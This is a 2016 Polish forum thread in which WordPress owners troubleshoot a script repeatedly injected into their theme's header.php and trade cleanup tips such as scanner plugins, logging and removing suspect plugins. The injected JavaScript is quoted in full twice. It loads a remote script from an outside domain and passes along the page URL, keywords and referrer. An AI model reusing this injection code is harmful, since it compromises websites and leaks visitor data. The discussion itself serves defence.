Wordpress i malware

[murgal 0]

Cześć,

 

 

Mam problem - na moich stronach na wordpressie co jakiś czas coś dokleja skrypt do headera, np:

 

 

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://xdeep.pl/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'J18171' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

 

 

 

Po usunięciu jest kilka dni spokoju potem powtórka. Kojarzycie co może dodawać takie śmieci?

[aTastyCookie 1]

Najpewniej masz dziurawego Wordpressa albo któryś z pluginów. Albo ściągnąłeś płatny szablon za darmo, to jest już trop.

 

Pewnie masz otwartego backdoor shella, przeszukaj serwer. Ale bez doświadczenia i umiejętności to trochę szukanie igły w stogu siana.

 

https://pl.wordpress.org/plugins/gotmls/ Spróbuj tym.

 

Edytowano Październik 5, 2016 przez aTastyCookie (zobacz historię edycji)

[murgal 0]

Mam płatny szablon lecz w 100% legalny ( z templatemonster ).

 

Pogadam z moim dostawcą hostingu - ViPower, może grepem przeskanują (pewnie jakiś eval).

[Bartosz Z 236]

No i co dalej, jak już "eval" znajdziesz? Jakoś musieli to dokleić.
Przenieś sobie to na VPS'a tymczasowo, podbij poziom logów w serwerze WWW (być może nawet poziom debug i treść żądań się przyda), zastaw TripWire i pilnuj momentu, w którym skrypty zostaną podmienione.

Uleczyłem tak jednego Wordpressa (z pomocą programisty, który go wdrażał). Dosyć wygodnie i skutecznie.

[murgal 0]

Doklejony został przez popieprzone uprawnienia, na 99%.

 

Jednego wordpressa wpuśiłem na VPSa i mocno loguje ruch, ale jak na złośc ten czysty.

[Diego164 0]

Cześć,

 

 

Mam problem - na moich stronach na wordpressie co jakiś czas coś dokleja skrypt do headera, np:

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://xdeep.pl/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'J18171' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

Po usunięciu jest kilka dni spokoju potem powtórka. Kojarzycie co może dodawać takie śmieci?

 

Dokladnie mam ten sam problem i chcialem wlasnie zalozyc tu temat z tym problemem.

Dokleja mi do headera powyzszy kod z losowymi stronami i nie dosc, ze to spowalnia stronę o nawet 10s to nawet mozna miec zablokowaną stronę przez prawdopodobnie wirusy na stronie.

 

Ten kod się dokleja co kilka godzin, nie co kilka dni...

 

E:

ustawilem chmody na 600 dla header.php i sprawdze czy doklei ponownie

No i znalazlem dziwne nazwy uzytkownikow z prawami administratora, np. wp.service.controller

Oczywiscie rejestracja na mojej stronie jest wylaczona. Warto sprawdzic

Edytowano Październik 6, 2016 przez Diego164 (zobacz historię edycji)

[murgal 0]

U mnie również wyłączona ale dodatkowych użytkowników brak (w panelu), Ty ich znalazłeś w bazie?

 

[Diego164 0]

w panelu.

W nocy sie meczylem z tym, myslalem ze rozwiazalem problem i znowu rano dokleilo na 8 wordpressach jednoczesnie (WTF?) ten syf do header.php

 

Robilem aktualizacje, wszystkie wtyczki, pobralem 2 wtyczki do skanowania syfu i troche tego sie nazbieralo, ale pousuwalem tylko, ze jedna wtyczka pokazywala swoja czesc problemow a ta druga swoja czesc i wydaje mi sie, ze nadal mam ten syf, ale najpierw to polecalbym Tobie zainstalowac te wtyczki:

Wordfence Security

i

Sucuri Security - Auditing, Malware Scanner and Hardening

 

i ponaprawiaj te bledy co Tobie wyjdą po skanowaniu, bo pewnie bedziesz mial backdoory jak ja. Tyle mogę narazie powiedziec, ja dalej szukam zrodlo tego syfu.

[murgal 0]

https://github.com/maxwellss/wpdev/blob/master/cleaner_2.10.php

 

 

Wrzuć ten skrypt na serwer i odpal.

 

 

 

[Gość Kamikadze]

Odpalałeś go z poziomu linuxa czy php przez przeglądarkę?

[murgal 0]

Z poziomu konsoli ale też po przypisaniu uprawnień z przeglądarki. Czemu pytasz?

[Diego164 0]

http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html

 

tu jest wiecej info

Edytowano Październik 7, 2016 przez Diego164 (zobacz historię edycji)

[Gość Kamikadze]

Z poziomu konsoli ale też po przypisaniu uprawnień z przeglądarki. Czemu pytasz?

 

Na przyszłość

[murgal 0]

Ja skonfigurowałem securi + wp security all in one + cleaner. Zobaczymy.

[Bartosz Z 236]

Głowię się, na co Wam tyle badziewia

[Gość Kamikadze]

No i co dalej, jak już "eval" znajdziesz? Jakoś musieli to dokleić.

Przenieś sobie to na VPS'a tymczasowo, podbij poziom logów w serwerze WWW (być może nawet poziom debug i treść żądań się przyda), zastaw TripWire i pilnuj momentu, w którym skrypty zostaną podmienione.

 

Uleczyłem tak jednego Wordpressa (z pomocą programisty, który go wdrażał). Dosyć wygodnie i skutecznie.

 

 

Głowię się, na co Wam tyle badziewia

 

 

Zarzucisz jakimś linkiem żeby o tym poczytać?

[Bartosz Z 236]

O czym?

[Gość Kamikadze]

Jak podnieść poziom logów żeby wyczulić na tego typu dane.

[Bartosz Z 236]

Ja użyłem mod_log_forensic + najwyższy poziom logów Apache + TripWire z powiadomieniem mailowym.

Z devem po kolei dochodziliśmy do kolejnych skryptów, które były zasyfione i odpytywane przez szkodników. On je czyścił i tak w kółko - aż do wyrżnięciu ostatnich linijek kodu (źródłem okazała się dziurka w formularzu w jakiejś autorskiej wtyczce).

[Diego164 0]

@murgal

 

Masz wtyczke visual composer? Dzis znowu dokleilo mi na PRAWIE wszystkich wordpressach, w tym której nie dokleilo usunąłem wtyczke Visual Composer (zawsze jej uzywam na wszystkich stronach) i nie dokleilo juz nic do header, a na reszcie zrobilem rozne eksperymenty ktore nie zadzialaly, wiec jednak to ta wtyczka ma jakiś syf ktory dokleja ten irytujący skrypt do header.php

 

 

E.:

No i na tamtej stronie co nie dokleilo pousuwalem jeszcze te podstawowe szablony wordpressa (tam tez dokleja), wiec moze tu lezal problem.

Edytowano Październik 8, 2016 przez Diego164 (zobacz historię edycji)

[murgal 0]

U mnie czysto narazie.

 

 

Co do wtyczki, mam :

 

Visual Form Builder oraz MotoPress Content Editor oraz pakiet wtyczek od Cherry, mam template od templatemonster i musiałem to doinstalować.

 

 

Wywaliłem :

 

Contact Forma (nie używam)

Motopress content editor

Pozostałe szablony

 

Ze wszystkich wordpressów.

 

WP Security + Sucuri pouruchamiane i skonfigurowane. Zostawiam tak jak jest, zobaczymy.

Edytowano Październik 8, 2016 przez murgal (zobacz historię edycji)

[Diego164 0]

@murgal

 

Sprawdz teraz czy nie dokleilo bo u mnie znowu problem wrocil.

[murgal 0]

U mnie czysto.

 

 

Przeskanowałeś tym cleanerem skrypt?

 

 

Skonfigurowałeś dobrze WP Security i Sucuri?

Edytowano Październik 10, 2016 przez murgal (zobacz historię edycji)

[webanti 3]

Sorry, że odgrzebuje ale może komuś pomoże - stworzyliśmy darmowy antywirus dla Wordpress, Joomla i innych CMSów.

https://webanti.com - zachęcam do przetestowania.

Antywirus stworzyliśmy dlatego, ponieważ wiele osób się do nas zgłaszało z problemem malware na stronie więc tym bardziej zachęcam ponieważ aktualni użytkownicy chwalą. Usługa jest dość młoda - działamy publicznie dopiero od miesiąca.

 

Z tego co widzimy, to konta w większości rejestrują osoby, które już mają wirusa i chcą go usunać, ale zapraszamy do rejestracji jeszcze przed zawirusowaniem, ponieważ główną cechą webanti ma być to aby poinformowało, że coś się stało ze stronę. Więc lepiej działać prewencyjnie.

[literky 0]

 

 

ponieważ wiele osób się do nas zgłaszało z problemem malware na stronie więc tym bardziej zachęcam ponieważ aktualni użytkownicy chwalą.

 

Pamiętam jak umieściliście na jednej z grup facebookowych dot. tworzenia stron internetowych pytanie:

 

"Kto z was miał problemy z malware na swojej stronie?".

 

Nie było odpowiedzi